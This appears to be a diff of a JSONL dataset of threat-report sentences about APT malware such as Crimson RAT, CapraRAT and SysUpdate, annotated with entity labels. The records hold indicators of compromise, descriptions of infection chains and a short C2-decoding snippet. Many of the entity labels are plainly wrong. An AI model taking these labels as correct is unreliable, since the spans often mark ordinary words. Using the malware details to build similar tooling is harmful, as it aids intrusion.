campaigns.","entities":[{"id":21641,"label":"location","start_offset":79,"end_offset":83},{"id":21642,"label":"location","start_offset":123,"end_offset":126},{"id":21643,"label":"attack-pattern","start_offset":156,"end_offset":170}],"relations":[],"Comments":[]} -{"id":6917,"text":"The majority of targets we observed were from North Korea or individuals who worked on North Korea-related issues.","entities":[],"relations":[],"Comments":[]} -{"id":6919,"text":"The vulnerabilities underlying these exploits included: Internet Explorer - CVE-2018-8653 Internet Explorer - CVE-2019-0676 Chrome - CVE-2019-5786 Windows Kernel - CVE-2019-0808 Internet Explorer - CVE-2019-1367 Internet Explorer - CVE-2019-1429","entities":[],"relations":[],"Comments":[]} -{"id":6925,"text":"Exploiting CVE-2019-0676 enabled attackers to reveal presence or non-presence of files on the victim’s computer; this information was later used to decide whether or not a second stage exploit should be delivered.","entities":[],"relations":[],"Comments":[]} -{"id":6926,"text":"The attack vector for CVE-2019-1367 was rather atypical as the exploit was delivered from an Office document abusing the online video embedding feature to load an external URL conducting the exploitation.","entities":[{"id":21664,"label":"tools","start_offset":11,"end_offset":17},{"id":21666,"label":"location","start_offset":155,"end_offset":159}],"relations":[],"Comments":[]} -{"id":6931,"text":"This APT group (also referred to as Operation C-Major, PROJECTM, Mythic Leopard, and Transparent Tribe) has been known to use social engineering and phishing lures as an entry point, after which, it deploys the Crimson RAT malware to steal information from its victims.","entities":[{"id":21681,"label":"threat-actor","start_offset":55,"end_offset":63},{"id":21683,"label":"location","start_offset":81,"end_offset":84},{"id":21685,"label":"location","start_offset":145,"end_offset":148},{"id":21686,"label":"attack-pattern","start_offset":149,"end_offset":157},{"id":21687,"label":"location","start_offset":176,"end_offset":181}],"relations":[],"Comments":[]} -{"id":6932,"text":"In late 2021, we saw the group leverage CapraRAT, an Android RAT with clear similarities in design to the group’s favored Windows malware, Crimson RAT.","entities":[{"id":21690,"label":"malware","start_offset":31,"end_offset":39},{"id":21692,"label":"malware","start_offset":53,"end_offset":64},{"id":21693,"label":"location","start_offset":70,"end_offset":75}],"relations":[],"Comments":[]} -{"id":6935,"text":"Looking into one of Earth Karkaddan’s recent campaigns Typically, Earth Karkaddan’s arrival methods include the use of spear-phishing emails and a USB worm that would then drop and execute a remote access trojan (RAT). Figure 1. Earth Karkaddan’s attack chain ","entities":[{"id":21704,"label":"location","start_offset":119,"end_offset":124},{"id":21705,"label":"attack-pattern","start_offset":125,"end_offset":133},{"id":21706,"label":"location","start_offset":141,"end_offset":144},{"id":21707,"label":"location","start_offset":177,"end_offset":180},{"id":21708,"label":"location","start_offset":191,"end_offset":197},{"id":21710,"label":"location","start_offset":234,"end_offset":239}],"relations":[],"Comments":[]} -{"id":6937,"text":"of a fake government-related spear-phishing email","entities":[{"id":21713,"label":"location","start_offset":29,"end_offset":34},{"id":21714,"label":"attack-pattern","start_offset":35,"end_offset":43}],"relations":[],"Comments":[]} -{"id":6938,"text":" Figure 3. An example of a coronavirus-related spear-phishing email attachment Once the victim downloads the malicious macro, it will decrypt an embedded executable dropper that is hidden inside a text box, which will then be saved to a hardcoded path prior to it executing in the machine. Figure 4. Malicious macro that decrypts an executable hidden inside a text box Figure 5. Examples of encrypted Crimson RAT executables hidden inside text boxes Once the executable file is executed, it will proceed to unzip a file named mdkhm.zip and then execute a Crimson RAT executable named dlrarhsiva.exe.","entities":[{"id":21716,"label":"location","start_offset":52,"end_offset":57},{"id":21717,"label":"attack-pattern","start_offset":58,"end_offset":66},{"id":21718,"label":"location","start_offset":138,"end_offset":142},{"id":21719,"label":"location","start_offset":222,"end_offset":226},{"id":21722,"label":"malware","start_offset":420,"end_offset":431},{"id":21723,"label":"location","start_offset":514,"end_offset":518},{"id":21724,"label":"location","start_offset":559,"end_offset":562},{"id":21725,"label":"malware","start_offset":578,"end_offset":589}],"relations":[],"Comments":[]} -{"id":6939,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":6940,"text":"The dlrarhsiva.exe Crimson RAT executable ","entities":[{"id":21727,"label":"malware","start_offset":19,"end_offset":30}],"relations":[],"Comments":[]} -{"id":6941,"text":"Earth Karkaddan actors are known to use the Crimson RAT malware in its campaigns to communicate with its command-and-control (C&C) server to download other malware or exfiltrate data.","entities":[{"id":21728,"label":"location","start_offset":0,"end_offset":5},{"id":21729,"label":"location","start_offset":23,"end_offset":26},{"id":21730,"label":"malware","start_offset":44,"end_offset":55},{"id":21731,"label":"location","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} -{"id":6942,"text":"Our analysis shows that the Crimson RAT malware is compiled as a .NET binary with minimal obfuscation.","entities":[{"id":21732,"label":"malware","start_offset":28,"end_offset":39}],"relations":[],"Comments":[]} -{"id":6944,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} -{"id":6945,"text":"A list of minimally obfuscated commands, function names, and variables from a Crimson RAT malware sample Crimson RAT can steal credentials from browsers, collect antivirus information, capture screenshots, and list victim drives, processes, and directories.","entities":[{"id":21735,"label":"location","start_offset":2,"end_offset":6},{"id":21736,"label":"location","start_offset":57,"end_offset":60},{"id":21737,"label":"malware","start_offset":78,"end_offset":89},{"id":21738,"label":"location","start_offset":98,"end_offset":104},{"id":21739,"label":"malware","start_offset":109,"end_offset":120},{"id":21740,"label":"location","start_offset":121,"end_offset":124},{"id":21741,"label":"location","start_offset":210,"end_offset":213},{"id":21742,"label":"location","start_offset":214,"end_offset":218},{"id":21743,"label":"location","start_offset":245,"end_offset":248}],"relations":[],"Comments":[]} -{"id":6947,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} -{"id":6948,"text":"Network traffic from a Crimson RAT malware sample ObliqueRat Malware Analysis ","entities":[{"id":21749,"label":"malware","start_offset":23,"end_offset":34},{"id":21750,"label":"location","start_offset":43,"end_offset":49},{"id":21751,"label":"malware","start_offset":54,"end_offset":64}],"relations":[],"Comments":[]} -{"id":6949,"text":"Aside from the Crimson RAT malware, the Earth Karkaddan APT group is also known to use the ObliqueRat malware in its campaigns.","entities":[{"id":21753,"label":"location","start_offset":40,"end_offset":45},{"id":21754,"label":"location","start_offset":56,"end_offset":59},{"id":21755,"label":"malware","start_offset":91,"end_offset":101}],"relations":[],"Comments":[]} -{"id":6950,"text":"This malware is also commonly distributed in spear-phishing campaigns using social engineering tactics to lure victims into downloading another malicious document.","entities":[{"id":21756,"label":"location","start_offset":45,"end_offset":50},{"id":21757,"label":"attack-pattern","start_offset":51,"end_offset":59},{"id":21758,"label":"location","start_offset":106,"end_offset":110}],"relations":[],"Comments":[]} -{"id":6952,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} -{"id":6953,"text":"Initial spear-phishing document with a link to another malicious document Once the victim clicks the link, it will download a document laced with a malicious macro.","entities":[{"id":21767,"label":"location","start_offset":8,"end_offset":13},{"id":21768,"label":"attack-pattern","start_offset":14,"end_offset":22},{"id":21769,"label":"location","start_offset":114,"end_offset":118}],"relations":[],"Comments":[]} -{"id":6954,"text":"Upon enabling the macro, it will then download the ObliqueRat malware that is hidden inside an image file.","entities":[{"id":21770,"label":"location","start_offset":28,"end_offset":32},{"id":21771,"label":"tools","start_offset":51,"end_offset":61}],"relations":[],"Comments":[]} -{"id":6955,"text":" Figure 10.","entities":[],"relations":[],"Comments":[]} -{"id":6956,"text":"The downloaded \"1More-details.doc\" contains malicious macros that will download and execute the ObliqueRat malware in a victim’s machine The macros inside the file will then download a bitmap image (BMP) file where the ObliqueRAT malware is hidden, decode the downloaded BMP file, then create a persistence mechanism by creating a Startup URL which will automatically run the ObliqueRAT malware.","entities":[{"id":21773,"label":"location","start_offset":66,"end_offset":70},{"id":21774,"label":"location","start_offset":80,"end_offset":83},{"id":21775,"label":"malware","start_offset":96,"end_offset":106},{"id":21776,"label":"location","start_offset":168,"end_offset":172},{"id":21777,"label":"malware","start_offset":223,"end_offset":233},{"id":21778,"label":"location","start_offset":335,"end_offset":342},{"id":21779,"label":"location","start_offset":353,"end_offset":357},{"id":21780,"label":"malware","start_offset":380,"end_offset":390}],"relations":[],"Comments":[]} -{"id":6957,"text":" Figure 11.","entities":[],"relations":[],"Comments":[]} -{"id":6958,"text":"Malicious macro codes will download, decode, and execute the ObliqueRat malware Figure 12 shows a summary of the ObliqueRat malware’s infection chain: Figure 12.","entities":[{"id":21782,"label":"location","start_offset":22,"end_offset":26},{"id":21783,"label":"location","start_offset":45,"end_offset":48},{"id":21784,"label":"malware","start_offset":61,"end_offset":71},{"id":21786,"label":"tools","start_offset":117,"end_offset":127}],"relations":[],"Comments":[]} -{"id":6959,"text":"ObliqueRat attack chain ","entities":[{"id":21788,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} -{"id":6960,"text":"Below is a list of backdoor commands that this particular ObliqueRAT malware variant can perform: Command (v5.2) Info 0 System information ","entities":[{"id":21789,"label":"location","start_offset":11,"end_offset":15},{"id":21790,"label":"malware","start_offset":58,"end_offset":68},{"id":21791,"label":"location","start_offset":85,"end_offset":88}],"relations":[],"Comments":[]} -{"id":6965,"text":"Find certain files RHT Delete files ","entities":[],"relations":[],"Comments":[]} -{"id":6966,"text":"Note that in this specific campaign, both the Crimson RAT malware downloader document and the ObliqueRat malware downloader share the same download domain, which is sharingmymedia[.]com.","entities":[{"id":21800,"label":"location","start_offset":27,"end_offset":35},{"id":21801,"label":"malware","start_offset":46,"end_offset":57},{"id":21802,"label":"location","start_offset":86,"end_offset":89},{"id":21803,"label":"tools","start_offset":94,"end_offset":104},{"id":21804,"label":"location","start_offset":134,"end_offset":138}],"relations":[],"Comments":[]} -{"id":6968,"text":" Figure 13.","entities":[],"relations":[],"Comments":[]} -{"id":6969,"text":"Crimson RAT and ObliqueRat spear-phishing email attachments that feature the same download domain CapraRAT, One of Earth Karkaddan’s custom Android RAT","entities":[{"id":21808,"label":"malware","start_offset":0,"end_offset":11},{"id":21809,"label":"location","start_offset":12,"end_offset":15},{"id":21810,"label":"malware","start_offset":16,"end_offset":26},{"id":21811,"label":"location","start_offset":27,"end_offset":32},{"id":21812,"label":"attack-pattern","start_offset":33,"end_offset":41},{"id":21813,"label":"location","start_offset":77,"end_offset":81},{"id":21814,"label":"malware","start_offset":102,"end_offset":110},{"id":21815,"label":"location","start_offset":112,"end_offset":115},{"id":21816,"label":"location","start_offset":119,"end_offset":124},{"id":21817,"label":"malware","start_offset":144,"end_offset":155}],"relations":[],"Comments":[]} -{"id":6970,"text":"Aside from using spear-phishing emails and a USB worm as arrival vectors, Earth Karkaddan also uses Android RATs that could be deployed by means of malicious phishing links.","entities":[{"id":21818,"label":"location","start_offset":17,"end_offset":22},{"id":21819,"label":"attack-pattern","start_offset":23,"end_offset":31},{"id":21820,"label":"location","start_offset":39,"end_offset":42},{"id":21821,"label":"location","start_offset":74,"end_offset":79},{"id":21822,"label":"location","start_offset":139,"end_offset":144},{"id":21823,"label":"attack-pattern","start_offset":158,"end_offset":166}],"relations":[],"Comments":[]} -{"id":6971,"text":"This is not particularly novel for the APT group — in 2018, it used StealthAgent (detected by Trend Micro as AndroidOS_SMongo.HRX), an Android spyware that can intercept phone calls and messages, track victims’ locations, and steal photos.","entities":[{"id":21824,"label":"location","start_offset":39,"end_offset":42},{"id":21826,"label":"malware","start_offset":68,"end_offset":80},{"id":21828,"label":"location","start_offset":156,"end_offset":159},{"id":21829,"label":"location","start_offset":182,"end_offset":185},{"id":21830,"label":"location","start_offset":222,"end_offset":225}],"relations":[],"Comments":[]} -{"id":6972,"text":"In 2020, Earth Karkaddan used an updated version of the AhMyth Android RAT to target Indian military and government personnel via a disguised porn app and a fraudulent national Covid-19 tracking app.","entities":[{"id":21834,"label":"malware","start_offset":63,"end_offset":74},{"id":21835,"label":"location","start_offset":78,"end_offset":84},{"id":21837,"label":"location","start_offset":101,"end_offset":104},{"id":21838,"label":"location","start_offset":151,"end_offset":154},{"id":21839,"label":"location","start_offset":168,"end_offset":176}],"relations":[],"Comments":[]} -{"id":6973,"text":"We observed this group using another Android RAT — TrendMicro has named this “CapraRat”— which is possibly a modified version of an open-source RAT called AndroRAT.","entities":[{"id":21841,"label":"malware","start_offset":37,"end_offset":48},{"id":21844,"label":"attack-pattern","start_offset":137,"end_offset":143}],"relations":[],"Comments":[]} -{"id":6974,"text":"While analyzing this android RAT, we saw several similar capabilities to the CrimsonRat malware that the group usually uses to infect Windows systems.","entities":[{"id":21846,"label":"malware","start_offset":21,"end_offset":32}],"relations":[],"Comments":[]} -{"id":6975,"text":"We have been observing CapraRAT samples since 2017, and one of the first samples we analyzed (SHA-256: d9979a41027fe790399edebe5ef8765f61e1eb1a4ee1d11690b4c2a0aa38ae42, detected by Trend Micro as as AndroidOS_Androrat.HRXD)","entities":[{"id":21848,"label":"malware","start_offset":23,"end_offset":31},{"id":21850,"label":"location","start_offset":53,"end_offset":56},{"id":21853,"label":"SHA2","start_offset":104,"end_offset":168}],"relations":[],"Comments":[]} -{"id":6976,"text":"revealed some interesting things in that year: they used \"com.example.appcode.appcode\" as the APK package name and used a possible public certificate “74bd7b456d9e651fc84446f65041bef1207c408d,” which possibly meant the sample was used for testing, and they just started to use it for their campaigns during that year.","entities":[{"id":21856,"label":"location","start_offset":111,"end_offset":114},{"id":21857,"label":"location","start_offset":131,"end_offset":137},{"id":21858,"label":"MD5","start_offset":151,"end_offset":191},{"id":21859,"label":"location","start_offset":219,"end_offset":225},{"id":21860,"label":"location","start_offset":248,"end_offset":251},{"id":21861,"label":"identity","start_offset":257,"end_offset":261}],"relations":[],"Comments":[]} -{"id":6978,"text":"In previous years, some CrimsonRAT samples were also found to be hosted on the viral91[.]xyz domain.","entities":[],"relations":[],"Comments":[]} -{"id":6979,"text":" Figure 14. CrimsonRAT malware hosted in viral91[.]xyz We were also able to source a phishing document, “csd_car_price_list_2017,” that is related to this domain and has been seen in the wild in 2017.","entities":[{"id":21868,"label":"attack-pattern","start_offset":84,"end_offset":90},{"id":21869,"label":"attack-pattern","start_offset":93,"end_offset":101},{"id":21870,"label":"location","start_offset":170,"end_offset":173}],"relations":[],"Comments":[]} -{"id":6985,"text":"Access the unique identification number Access location information","entities":[],"relations":[],"Comments":[]} -{"id":6988,"text":" Once the Android RAT is executed, it will attempt to establish a connection to its C&C server, 209[.]127[.]19[.]241[:]10284.","entities":[{"id":21884,"label":"malware","start_offset":10,"end_offset":21},{"id":21885,"label":"location","start_offset":38,"end_offset":42}],"relations":[],"Comments":[]} -{"id":6989,"text":"We have observed that the Remote Desktop Protocol (RDP) certificate associated in this deployment, “WIN-P9NRMH5G6M8,” is a common string found in previously identified Earth Karkaddan C&C servers.","entities":[{"id":21886,"label":"attack-pattern","start_offset":26,"end_offset":49},{"id":21887,"label":"malware","start_offset":51,"end_offset":54}],"relations":[],"Comments":[]} -{"id":6990,"text":" Figure 15. Decompiled code from CapraRAT connecting to its C&C server Figure 16. CapraRAT config showing its C&C server and port information Figure 17.","entities":[{"id":21892,"label":"malware","start_offset":91,"end_offset":99},{"id":21893,"label":"location","start_offset":130,"end_offset":133}],"relations":[],"Comments":[]} -{"id":6991,"text":"Backdoor commands found in CapraRAT This APK file also has the ability to drop mp4 or APK files from asset directory.","entities":[],"relations":[],"Comments":[]} -{"id":6992,"text":" Figure 18. CapraRAT APK file drops an mp4 file The RAT also has a persistence mechanism that always keeps the app active.","entities":[{"id":21897,"label":"malware","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} -{"id":6993,"text":"It checks whether the service is still running every minute, and if it is not, the service will be launched again.","entities":[{"id":21898,"label":"TIME","start_offset":47,"end_offset":59},{"id":21899,"label":"location","start_offset":61,"end_offset":64},{"id":21900,"label":"location","start_offset":91,"end_offset":95}],"relations":[],"Comments":[]} -{"id":6994,"text":" Figure 19.","entities":[],"relations":[],"Comments":[]} -{"id":6995,"text":"CapraRAT’s persistence mechanism Reducing risks:","entities":[{"id":21902,"label":"malware","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} -{"id":7001,"text":"Be wary of the scope of app permissions","entities":[],"relations":[],"Comments":[]} -{"id":7004,"text":"It also protects organizations from email-based threats.","entities":[],"relations":[],"Comments":[]} -{"id":7008,"text":"Indicators of Compromise","entities":[],"relations":[],"Comments":[]} -{"id":7011,"text":"Update as of April 27, 2021, 7 A.M. E.T.:","entities":[{"id":21964,"label":"TIME","start_offset":29,"end_offset":40}],"relations":[],"Comments":[]} -{"id":7014,"text":"This blog details how Iron Tiger threat actors have updated their toolkit with an updated SysUpdate malware variant that now uses five files in its infection routine instead of the usual three.","entities":[],"relations":[],"Comments":[]} -{"id":7017,"text":"A Look at the Iron Tiger Threat Group","entities":[{"id":21986,"label":"threat-actor","start_offset":14,"end_offset":24}],"relations":[],"Comments":[]} -{"id":7019,"text":"In 2020 and 2021, Talent-Jump found new samples for malware families that are attributed to the Iron Tiger threat actor, which is also referred to as LuckyMouse, EmissaryPanda, and APT27.","entities":[{"id":21994,"label":"location","start_offset":8,"end_offset":11},{"id":21997,"label":"location","start_offset":74,"end_offset":77},{"id":22000,"label":"location","start_offset":177,"end_offset":180},{"id":22001,"label":"threat-actor","start_offset":181,"end_offset":186}],"relations":[],"Comments":[]} -{"id":7020,"text":"While investigating Operation DRBControl in 2019, we found several connections to multiple threat actors: Iron Tiger, which uses the HyperBro trojan and some infrastructure links Winnti, which uses the same infrastructure and code-sharing links detailed in our paper Bronze President, a threat actor that targets non-governmental organizations (NGOs). ","entities":[{"id":22004,"label":"threat-actor","start_offset":107,"end_offset":117},{"id":22005,"label":"malware","start_offset":134,"end_offset":142},{"id":22006,"label":"location","start_offset":150,"end_offset":153},{"id":22007,"label":"malware","start_offset":180,"end_offset":186},{"id":22008,"label":"location","start_offset":203,"end_offset":207},{"id":22009,"label":"location","start_offset":223,"end_offset":226}],"relations":[],"Comments":[]} -{"id":7022,"text":"However, after the publication of our report, we learned that the Type 2 malware family described in our report was the same as the “RCSession” malware family that Dell Secureworks described in a blog that they published in December 2019.","entities":[{"id":22013,"label":"location","start_offset":49,"end_offset":56},{"id":22014,"label":"location","start_offset":66,"end_offset":70},{"id":22015,"label":"location","start_offset":120,"end_offset":124},{"id":22016,"label":"tools","start_offset":133,"end_offset":142}],"relations":[],"Comments":[]} -{"id":7023,"text":"After finding multiple tools belonging to the Iron Tiger threat actor (which we now track as Earth Smilodon), it is likely that the new malware families that we found during the Operation DRBControl investigation came from the same threat actor.","entities":[{"id":22019,"label":"threat-actor","start_offset":46,"end_offset":56},{"id":22020,"label":"threat-actor","start_offset":93,"end_offset":107},{"id":22021,"label":"location","start_offset":116,"end_offset":122},{"id":22023,"label":"location","start_offset":227,"end_offset":231}],"relations":[],"Comments":[]} -{"id":7024,"text":"New Version of SysUpdate Malware Figure 1.","entities":[{"id":22024,"label":"malware","start_offset":15,"end_offset":24}],"relations":[],"Comments":[]} -{"id":7025,"text":"The old and new SysUpdate infection chains In December 2020, we found a sample that we identified as one belonging to the SysUpdate malware family, also named Soldier, FOCUSFJORD, and HyperSSL.","entities":[{"id":22026,"label":"location","start_offset":8,"end_offset":11},{"id":22027,"label":"malware","start_offset":16,"end_offset":25},{"id":22029,"label":"location","start_offset":77,"end_offset":83},{"id":22030,"label":"location","start_offset":106,"end_offset":109},{"id":22031,"label":"malware","start_offset":127,"end_offset":136},{"id":22033,"label":"malware","start_offset":173,"end_offset":183},{"id":22034,"label":"location","start_offset":185,"end_offset":188},{"id":22035,"label":"malware","start_offset":189,"end_offset":197}],"relations":[],"Comments":[]} -{"id":7026,"text":"SysUpdate was first described by the NCC Group in 2018.","entities":[{"id":22036,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":7028,"text":"An additional executable that serves as a launcher is loaded in memory, which then loads the final SysUpdate payload.","entities":[{"id":22046,"label":"malware","start_offset":99,"end_offset":108}],"relations":[],"Comments":[]} -{"id":7029,"text":"Based on our investigation, instead of the usual three files, the threat actor used five: dlpumgr32.exe, a legitimate signed file that belongs to the DESlock+ product DLPPREM32.DLL, a malicious DLL sideloaded by dlpumgr32.exe that loads and decodes DLPPREM32.bin DLPPREM32.bin, a shellcode that decompresses and loads a launcher in memory data.res, an encrypted file decoded by the launcher and contains two SysUpdate versions: one for a 32-bit architecture and another for a 64-bit architecture config.res, an encrypted file decoded by the launcher and contains the SysUpdate configuration, such as the command-and-control (C&C) address ","entities":[{"id":22049,"label":"location","start_offset":238,"end_offset":241},{"id":22050,"label":"location","start_offset":309,"end_offset":312},{"id":22051,"label":"location","start_offset":392,"end_offset":395},{"id":22052,"label":"malware","start_offset":409,"end_offset":418},{"id":22053,"label":"location","start_offset":429,"end_offset":432},{"id":22055,"label":"location","start_offset":459,"end_offset":462},{"id":22057,"label":"location","start_offset":551,"end_offset":554},{"id":22058,"label":"malware","start_offset":568,"end_offset":577},{"id":22059,"label":"location","start_offset":613,"end_offset":616}],"relations":[],"Comments":[]} -{"id":7032,"text":"In detail, this process involves multiple steps.","entities":[],"relations":[],"Comments":[]} -{"id":7034,"text":"4 Directory to copy all files %PROGRAMDATA%\\Test\\ 8 Name of the legitimate executable dlpumgr32.exe 12 Name of the sideloaded DLL DLPPREM32.DLL ","entities":[],"relations":[],"Comments":[]} -{"id":7035,"text":"16 Name of the shellcode DLPPREM32.bin 20 Name of the encrypted payload data.res 24 MD5 of the encrypted payload e43e40416520dab5b4c44ac8af907078 28 Name of the encrypted configuration config.res 32 Name of the registry key value servTest 36 Name of the service DisplayName Servdisplay Table 1.","entities":[{"id":22066,"label":"MD5","start_offset":121,"end_offset":153}],"relations":[],"Comments":[]} -{"id":7037,"text":"The launcher’s behavior changes depending on the number of arguments passed to the executable.","entities":[],"relations":[],"Comments":[]} -{"id":7041,"text":"Windows Management Instrumentation (WMI) will be used to run dlpumgr32.exe with arguments “-up -run -x” and it will exit the current process.","entities":[{"id":22079,"label":"attack-pattern","start_offset":0,"end_offset":34},{"id":22080,"label":"location","start_offset":41,"end_offset":45},{"id":22081,"label":"location","start_offset":104,"end_offset":107},{"id":22082,"label":"location","start_offset":111,"end_offset":115}],"relations":[],"Comments":[]} -{"id":7042,"text":"One argument.","entities":[],"relations":[],"Comments":[]} -{"id":7044,"text":"Three arguments.","entities":[],"relations":[],"Comments":[]} -{"id":7046,"text":"It encodes it using another key and writes it to the registry key “Software\\Classes\\scConfig” (HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER hive, depending on the privileges of the process).","entities":[{"id":22093,"label":"location","start_offset":32,"end_offset":35},{"id":22094,"label":"malware","start_offset":135,"end_offset":139}],"relations":[],"Comments":[]} -{"id":7047,"text":"After decrypting the configuration, the config.res file is deleted.","entities":[],"relations":[],"Comments":[]} -{"id":7049,"text":"The launcher decrypts the data.res file with a different hardcoded DES key.","entities":[],"relations":[],"Comments":[]} -{"id":7050,"text":"The result is a file with the following structure: Size of the 32-bit shellcode 32-bit shellcode Size of the 64-bit shellcode 64-bit shellcode Table 2.","entities":[{"id":22098,"label":"location","start_offset":40,"end_offset":49},{"id":22099,"label":"identity","start_offset":70,"end_offset":73},{"id":22100,"label":"identity","start_offset":88,"end_offset":91},{"id":22101,"label":"identity","start_offset":118,"end_offset":121},{"id":22102,"label":"identity","start_offset":136,"end_offset":139}],"relations":[],"Comments":[]} -{"id":7051,"text":"Structure of decrypted data.res file Lastly, the launcher starts a suspended process with the command line “C:\\Windows\\system32\\svchost.exe -k LocalServices,”and injects the appropriate shellcode into it (either 32- or 64-bit).","entities":[{"id":22104,"label":"location","start_offset":0,"end_offset":9},{"id":22105,"label":"identity","start_offset":223,"end_offset":226}],"relations":[],"Comments":[]} -{"id":7053,"text":" The following diagram summarizes the launch procedure: Figure 2.","entities":[],"relations":[],"Comments":[]} -{"id":7055,"text":"Analysis of the Payload","entities":[],"relations":[],"Comments":[]} -{"id":7056,"text":"The features of the updated SysUpdate payload look similar to its previous versions.","entities":[],"relations":[],"Comments":[]} -{"id":7059,"text":"Others have been in existence for many years, such as TPacket, SCM Client, SystemInfo, CMD5, CIOStream, and CInfo.","entities":[{"id":22118,"label":"malware","start_offset":75,"end_offset":85},{"id":22119,"label":"location","start_offset":104,"end_offset":107}],"relations":[],"Comments":[]} -{"id":7063,"text":" Some of the classes’ names","entities":[],"relations":[],"Comments":[]} -{"id":7068,"text":" It should be noted that we also found recent samples of the SysUpdate backdoor that do not implement these “new” classes.","entities":[{"id":22144,"label":"malware","start_offset":61,"end_offset":70}],"relations":[],"Comments":[]} +{"id":9911,"text":"The APT33 actors then issue commands to the bots and collect data from the bots using these VPN connections.","entities":[{"id":30245,"label":"threat-actor","start_offset":4,"end_offset":9},{"id":30246,"label":"location","start_offset":22,"end_offset":27},{"id":30247,"label":"location","start_offset":49,"end_offset":52}],"relations":[],"Comments":[]} +{"id":10621,"text":"Although much of Sandworm\u2019s activity targeting Ukraine and their attacks against the 2018 Winter Olympics have been covered publicly, some campaigns have not been reported.","entities":[{"id":32401,"label":"location","start_offset":9,"end_offset":13},{"id":32402,"label":"threat-actor","start_offset":17,"end_offset":25},{"id":32404,"label":"location","start_offset":55,"end_offset":58}],"relations":[],"Comments":[]} +{"id":5060,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, recently introduced a new capability into their credential phishing campaigns.","entities":[{"id":51165,"label":"location","start_offset":72,"end_offset":82},{"id":51166,"label":"campaign","start_offset":145,"end_offset":174},{"id":15621,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":15623,"label":"threat-actor","start_offset":57,"end_offset":68}],"relations":[{"id":1064,"from_id":15623,"to_id":51165,"type":"located-at"},{"id":1065,"from_id":15623,"to_id":51166,"type":"uses"}],"Comments":[]} +{"id":11485,"text":"The app is distributed under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites.","entities":[],"relations":[],"Comments":[]} +{"id":9990,"text":"View active directory objects dsquery.exe DsQuery","entities":[{"id":30504,"label":"location","start_offset":0,"end_offset":4},{"id":30505,"label":"malware","start_offset":30,"end_offset":41},{"id":30506,"label":"malware","start_offset":42,"end_offset":49}],"relations":[],"Comments":[]} +{"id":4730,"text":"Among other targets, this spyware was used to compromise journalists and opposition politicians.","entities":[],"relations":[],"Comments":[]} +{"id":2125,"text":"The following two conditions must both be met for a system to be vulnerable to attack: If your Struts application does not meet both of these conditions, your application may still be vulnerable but not (currently) exploitable via CVE-2018-11776.","entities":[{"id":47262,"label":"vulnerability","start_offset":232,"end_offset":246},{"id":47263,"label":"SOFTWARE","start_offset":96,"end_offset":102}],"relations":[],"Comments":[]} +{"id":8258,"text":"The obfuscation used was not particularly sophisticated.","entities":[],"relations":[],"Comments":[]} +{"id":183,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) ","entities":[],"relations":[],"Comments":[]} +{"id":1857,"text":" Figure 24. Running more system network configuration discovery scans","entities":[{"id":5442,"label":"attack-pattern","start_offset":29,"end_offset":67}],"relations":[],"Comments":[]} +{"id":13617,"text":"This oplib.dll library is then sideloaded.","entities":[{"id":51707,"label":"FILEPATH","start_offset":5,"end_offset":14}],"relations":[],"Comments":[]} +{"id":6519,"text":" MITRE ATT&CK Techniques Mapping Tactic Technique Resource Development Acquire Infrastructure: Web Services \u2013 T1583.006 Initial Access Phishing: Spearphishing Attachment \u2013 T1566.001 Phishing: Spearphishing Link \u2013 T1566.002 Execution Command and Scripting Interpreter: PowerShell \u2013 T1059.001","entities":[{"id":20197,"label":"attack-pattern","start_offset":142,"end_offset":150},{"id":20198,"label":"attack-pattern","start_offset":152,"end_offset":176},{"id":20199,"label":"attack-pattern","start_offset":189,"end_offset":197},{"id":20200,"label":"attack-pattern","start_offset":199,"end_offset":217},{"id":20201,"label":"location","start_offset":250,"end_offset":253},{"id":20202,"label":"attack-pattern","start_offset":254,"end_offset":263},{"id":20203,"label":"attack-pattern","start_offset":277,"end_offset":287}],"relations":[],"Comments":[]} +{"id":2317,"text":"It was interesting to see the use of Capstone.js, a port of the Capstone disassembly framework, in an exploit chain as Capstone is typically used for binary analysis.","entities":[{"id":47388,"label":"SOFTWARE","start_offset":37,"end_offset":48},{"id":47391,"label":"SOFTWARE","start_offset":119,"end_offset":127},{"id":47390,"label":"SOFTWARE","start_offset":64,"end_offset":94}],"relations":[],"Comments":[]} +{"id":3494,"text":"b64_data = str[len(\"magnet:?xt=urn:bhih:\"): tail] b64_decode = base64.b64decode(b64_data) key = ord(b64_decode[2]) data = b64_decode[4:] output_file = open(\"C2_info\", \"wb\") for single_byte in data: output_file.write(chr(ord(single_byte) ^ key)) output_file.close()","entities":[],"relations":[],"Comments":[]} +{"id":4652,"text":"A new form is displayed if the information is not provided via command prompt.","entities":[],"relations":[],"Comments":[]} +{"id":1150,"text":"\u201cjh\u201d itself is more common than would be expected given that, with fingers on the home row, it requires the right index finger to move and press another key before any other key is struck.","entities":[],"relations":[],"Comments":[]} +{"id":474,"text":" What can I do about it?","entities":[],"relations":[],"Comments":[]} +{"id":1319,"text":" FormerFirstRAT This remote administration tool (RAT) is referred to as \u201cFormerFirstRAT\u201d by its authors.","entities":[{"id":3989,"label":"malware","start_offset":1,"end_offset":15},{"id":3992,"label":"malware","start_offset":74,"end_offset":88}],"relations":[],"Comments":[]} +{"id":2414,"text":"It contains the core, beans, context and Spring Expression Language (SpEL) modules.","entities":[{"id":47492,"label":"SOFTWARE","start_offset":41,"end_offset":74}],"relations":[],"Comments":[]} +{"id":558,"text":"During the operation, 25.1 BTC from 538 wallets was sent to 1NDyJtNTjmwk5xPNhjgAMu4HDHigtobu1s (SHA256: CE11703DEF517306326C48A67A7C859A3DE0F18E2451DF226CE171389A5B7953), which is a wallet owned by Binance cryptocurrency 